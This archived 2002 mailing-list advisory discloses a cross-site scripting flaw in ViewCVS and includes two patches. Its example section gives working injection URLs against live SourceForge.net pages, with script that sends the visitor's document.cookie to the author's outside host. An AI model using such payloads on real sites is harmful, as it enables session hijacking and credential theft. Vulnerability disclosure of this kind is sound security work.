OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: office (officeoffice.ac)
Date: Sat May 18 2002 - 19:32:24 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ViewCVS: cross-site scripting bug

    I found the following cross-site scripting vulnerability in ViewCVS:

    Details
    ------------
    Product: ViewCVS
    Affected Version: 0.9.2 and under it
    Vendor's URL: http://viewcvs.sourceforge.net/
    Vendor Status: Informed. And they already fixed it only in their team.
                   But nothing has been published.

    Introduction
    ------------
    ViewCVS is a WWW interface for CVS Repositories. It is widely used in
    freesoft community and open source community. Unfortunately, it has
    the vulnerability of cross-site scripting.

    Proof
    -----------------
    If you access to the URL like;

    http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=>alert("hello")</script>
    http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("hello")</script>

    The former URL is valid for Internet Explorer 6.0, Opera 6.01, but not
    valid for Netscape 4.78, Netscape 6.2.2, mozilla 0.9.9 on windows XP.
    And these URL can do is only showing a popup window appearing.

    Example
    -----------------
    For example, you can see the vulnerability at the SourceForge.net
     (Vendor's site is on SourceForge.net).

    If you access to the sample URL following, your cookie (including
    your login information and session information about SourceForge.net)
    is stolen by my site (http://www.office.ac)

    The stolen cookie's information of Internet Explorer 6.0 includes your
    login information and session information about SourceForge.net.
    But the stolen cookie's information of Opera 6.01 and mozilla 0.9.9
    includes only user name, and the cookie information of Netscape 4.78
    and 6.2.2 is nothing. (I don't know why.)

    http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>
    http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>

    The ViewCVS at SourceForge.net is not newest version.
    And you can see the vulnerability of newest version of ViewCVS at GNU.

    http://subversions.gnu.org/cgi-bin/viewcvs/?cvsroot=>alert("hello")</script>
    http://subversions.gnu.org/cgi-bin/viewcvs/cvs-utils/CVSROOT/?sortby=rev"><script>alert("hello")</script>

    Vendor status
    --------------
    Vendors are noticed at 13 Mar 2002, and 26 Mar 2002.

    And I heard following:
    Some Japanese hackers (contributors belong to SourceForge.jp and
    Hyper NIKKI System Project) proposed a patch program to ViewCVS team
    in April. But ViewCVS team rejected it. ViewCVS team said they
    fixed it at April 1st.
    But nothing has been published by ViewCVS team after it.

    Patch
    --------------
    Two patches are here. I got these patches with the non-safe method,
    so I am not sure that their code are completely same to original.
    And I cannot understand about code nor programming at all.
    So I don't have any accountability about these patch.

    One was made by Kenji Suzuki <kenjipo.ganseki.ne.jp> / Hyper
    NIKKI System Project (http://www.h14m.org/).
    I heard it has been applied to the web page of Hyper
    NIKKI System Project, and Sourceforge.jp.

    --- viewcvs.py.orig Fri Dec 14 23:14:39 2001
    +++ viewcvs.py Sun Mar 31 15:24:34 2002
    -172,7 +172,7
         # parse the query params into a dictionary (and use defaults)
         query_dict = default_settings.copy()
         for name, values in cgi.parse().items():
    - query_dict[name] = values[0]
    + query_dict[name] = cgi.escape(values[0])
     
         # set up query strings, prefixed by question marks and ampersands
         query = sticky_query(query_dict)

    I heart another patch is made by ViewCVS team. I got this code
    from Taku YASUI <tachsourceforge.jp> / Sourceforge.jp
    (http://sourceforge.jp/) who had been proposed former patch to
    ViewCVS team.

    ===================================================================
    RCS file: /cvsroot/viewcvs/viewcvs/lib/viewcvs.py,v
    retrieving revision 1.107
    retrieving revision 1.108
    diff -u -r1.107 -r1.108
    --- viewcvs/viewcvs/lib/viewcvs.py 2002/02/22 09:20:46 1.107
    +++ viewcvs/viewcvs/lib/viewcvs.py 2002/04/01 01:32:16 1.108
    -180,8 +180,14
     
         # parse the query params into a dictionary (and use defaults)
         query_dict = default_settings.copy()
    +
    + # RE that ViewCVS doesn't use in any URL, but a CSS attack might
    + re_url_validate = re.compile('\'|"|<|>')
         for name, values in cgi.parse().items():
    - query_dict[name] = values[0]
    + # do not accept values that contain non-ViewCVS characters
    + # except for search
    + if not re.search(re_url_validate, values[0]) or name == 'search':
    + query_dict[name] = values[0]
     
         # set up query strings, prefixed by question marks and ampersands
         query = sticky_query(query_dict)

    --
    office
    officeukky.net
    officeoffice.ac
    http://www.office.ac/